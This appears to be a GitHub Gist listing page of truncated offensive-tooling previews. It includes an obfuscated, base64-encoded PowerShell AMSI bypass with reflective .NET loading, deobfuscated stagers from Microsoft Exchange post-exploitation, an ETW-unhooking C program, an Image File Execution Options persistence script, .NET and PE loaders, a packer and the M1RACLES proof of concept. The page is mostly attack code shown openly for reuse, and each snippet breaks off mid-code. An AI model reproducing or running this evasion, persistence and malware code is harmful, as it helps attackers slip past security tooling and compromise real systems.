aniqfakhrul
/ reflective.ps1
Created
May 28, 2021 09:09
Load .NET Code Reflectively + AMSI Scan Buffer Bypass
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| [SySTEM.TexT.EnCODING]::uNIcodE.getStriNG([sYsTEM.conVErt]::fROmBAsE64stRINg("IwBNAGEAdAB0ACAARwByAGEAZQBiAGUAcgBzACAAUgBlAGYAbABlAGMAdABpAG8AbgAgAG0AZQB0AGgAbwBkACAAdwBpAHQAaAAgAFcATQBGADUAIABhAHUAdABvAGwAbwBnAGcAaQBuAGcAIABiAHkAcABhAHMAcwAgAAoAWwBEAGUAbABlAGcAYQB0AGUAXQA6ADoAQwByAGUAYQB0AGUARABlAGwAZQBnAGEAdABlACgAKAAiAEYAdQBuAGMAYABgADMAWwBTAHQAcgBpAG4AZwAsACAAJAAoACgAWwBTAHQAcgBpAG4AZwBdAC4AQQBzAHMAZQBtAGIAbAB5AC4ARwBlAHQAVAB5AHAAZQAoACQAKAAnAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdADtAPUAbgAuAEIA7QBuAGQA7QBuAGcARgBsAOMAZwBzACcALgBuAG8AUgBNAEEAbABpAFoAZQAoAFsAQwBIAGEAcgBdACgANwAwACoAMgA0AC8AMgA0ACkAKwBbAEMAaABBAHIAXQAoADEAMQAxACsAMQA2AC0AMQA2ACkAKwBbAGMASABBAHIAXQAoADEANAArADEAMAAwACkAKwBbAEMAaABhAHIAXQAoADcAKwAxADAAMgApACsAWwBjAEgAQQBSAF0AKAA2ADgAKgA0ADMALwA0ADMAKQApACAALQByAGUAcABsAGEAYwBlACAAWwBjAEgAYQBSAF0AKABbAEIAeQB0AEUAXQAwAHgANQBjACkAKwBbAEMAaABBAFIAXQAoAFsAQgB5AHQARQBdADAAeAA3ADAAKQArAFsAYwBoAGEAcgBdACgAWwBCAFkAVABFAF0AMAB4ADcAYgApACsAWwBDAEgAQQBSAF0AKAA3ADcAKgAyADkALwAyADkAKQArAFsAYwBIAGEAcgBdACgAMQ |
JohnHammond
/ stage5_deobfuscated_188.166.162.201_update.png.ps1
Created
March 6, 2021 07:03
Microsoft Exchange Post-Exploitation Artifacts stage #5
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| function make_smb1_anonymous_login_packet { | |
| [Byte[]] $pkt = [Byte[]] (0x00) | |
| $pkt += 0x00,0x00,0x48 | |
| $pkt += 0xff,0x53,0x4D,0x42 | |
| $pkt += 0x73 | |
| $pkt += 0x00,0x00,0x00,0x00 | |
| $pkt += 0x18 | |
| $pkt += 0x01,0x48 | |
| $pkt += 0x00,0x00 | |
| $pkt += 0x00,0x00,0x00,0x00 |
JohnHammond
/ 188.166.162.201_update_stager.ps1
Created
March 6, 2021 05:49
Microsoft Exchange Post-Exploitation Stager 04
This file has been truncated, but you can view the full file.
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ((("{2070}{2069}{563}{1918}{1769}{1682}{51}{1258}{1854}{1127}{1374}{1599}{1168}{2427}{2098}{1823}{2257}{2997}{452}{1256}{1131}{155}{2084}{2946}{329}{1855}{1104}{1390}{1332}{1988}{202}{1781}{893}{2363}{2718}{818}{1334}{1965}{2542}{1164}{815}{772}{2274}{1214}{840}{2930}{2375}{384}{157}{2030}{2906}{2349}{2814}{1251}{2462}{1955}{3018}{687}{1636}{2950}{640}{1724}{2966}{2903}{992}{2636}{773}{1858}{2743}{1340}{561}{365}{521}{2341}{72}{442}{951}{944}{2160}{473}{2521}{806}{1311}{2348}{2126}{923}{2014}{2687}{2933}{845}{867}{742}{423}{2627}{624}{2144}{874}{2410}{330}{1267}{2233}{616}{713}{1878}{1562}{2617}{1917}{575}{841}{2109}{1109}{2161}{1587}{1272}{538}{2880}{532}{727}{886}{200}{737}{1150}{1972}{2001}{603}{2866}{2988}{963}{1830}{1441}{2618}{11}{753}{1021}{1305}{2021}{243}{2479}{919}{2548}{2059}{1569}{1968}{958}{2782}{1762}{2208}{2206}{2215}{814}{1748}{310}{1662}{299}{690}{1230}{1704}{1770}{1426}{1749}{2663}{1111}{1804}{2450}{2529}{2555}{1564}{735}{3006}{1579}{2776}{1120}{2853}{1399}{1210}{2220}{2231}{1186}{2262}{189 |
marcan
/ m1racles-poc.c
Last active
December 21, 2024 02:39
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| /* | |
| * m1racle-poc: a basic proof of concept for the M1RACLES vulnerability in the Apple M1. | |
| * | |
| * This program allows you to read and write the state of the s3_5_c15_c10_1 CPU register. | |
| * | |
| * Please visit m1racles.com for more information. | |
| * | |
| * Licensed under the MIT license. | |
| */ |
ropnop
/ go-sharp-loader.go
Created
August 5, 2020 17:12
Example Go file embedding multiple .NET executables
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| package main | |
| /* | |
| Example Go program with multiple .NET Binaries embedded | |
| This requires packr (https://github.com/gobuffalo/packr) and the utility. Install with: | |
| $ go get -u github.com/gobuffalo/packr/packr | |
| Place all your EXEs are in a "binaries" folder |
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| ######################################### | |
| # Created by @kuroi_dotsh - KuroiSH # | |
| # Website: https://dengisan.nl/ # | |
| # E-mail: [email protected] # | |
| ######################################### | |
| ; | |
| ; The executable is stored in the final section, so that it does not need | |
| ; relocations (as we can simply load it over our own headers and pad with | |
| ; virtualsize to keep our module running). |
xpn
/ unmanaged_dotnet_unhook_etw.c
Created
March 18, 2020 00:32
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| #include <stdio.h> | |
| #include <Windows.h> | |
| #include <MSCorEE.h> | |
| #include <MetaHost.h> | |
| #include <evntprov.h> | |
| int main() | |
| { | |
| ICLRMetaHost* metaHost = NULL; | |
| IEnumUnknown* runtime = NULL; |
iyre
/ Edit-RdpPort.ps1
Last active
November 28, 2021 05:36
Remotely manipulate RDP port assignments with PowerShell
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| Function Edit-RdpPort { | |
| <# | |
| .SYNOPSIS | |
| Changes the port assigned to RDP | |
| .DESCRIPTION | |
| Change the port assigned to RDP by updating the registry and restarting relevant services | |
| .PARAMETER ComputerName | |
| ComputerName that will have its port changed | |
| .PARAMETER Port | |
| New port number |
netbiosX
/ ImageFileExecutionOptions.ps1
Last active
June 14, 2024 09:22
Image File Execution Options Injection - Persistence Technique
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| <# | |
| ImageFileExecutionOptions v1.0 | |
| License: GPLv3 | |
| Author: @netbiosX | |
| #> | |
| # Image File Execution Options Injection Persistence Technique | |
| # https://pentestlab.blog/2020/01/13/persistence-image-file-execution-options-injection/ | |
| function Persist-Debugger |
enkomio
/ packer.sacara
Created
December 17, 2019 12:59
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| proc data_section | |
| S: | |
| // Hardcode the initial state of the S array | |
| byte 0x00, 0x01, 0x02, 0x03, 0x04, 0x05, 0x06, 0x07, 0x08, 0x09, 0x0A, 0x0B, 0x0C, 0x0D, 0x0E, 0x0F | |
| byte 0x10, 0x11, 0x12, 0x13, 0x14, 0x15, 0x16, 0x17, 0x18, 0x19, 0x1A, 0x1B, 0x1C, 0x1D, 0x1E, 0x1F | |
| byte 0x20, 0x21, 0x22, 0x23, 0x24, 0x25, 0x26, 0x27, 0x28, 0x29, 0x2A, 0x2B, 0x2C, 0x2D, 0x2E, 0x2F | |
| byte 0x30, 0x31, 0x32, 0x33, 0x34, 0x35, 0x36, 0x37, 0x38, 0x39, 0x3A, 0x3B, 0x3C, 0x3D, 0x3E, 0x3F | |
| byte 0x40, 0x41, 0x42, 0x43, 0x44, 0x45, 0x46, 0x47, 0x48, 0x49, 0x4A, 0x4B, 0x4C, 0x4D, 0x4E, 0x4F | |
| byte 0x50, 0x51, 0x52, 0x53, 0x54, 0x55, 0x56, 0x57, 0x58, 0x59, 0x5A, 0x5B, 0x5C, 0x5D, 0x5E, 0x5F | |
| byte 0x60, 0x61, 0x62, 0x63, 0x64, 0x65, 0x66, 0x67, 0x68, 0x69, 0x6A, 0x6B, 0x6C, 0x6D, 0x6E, 0x6F |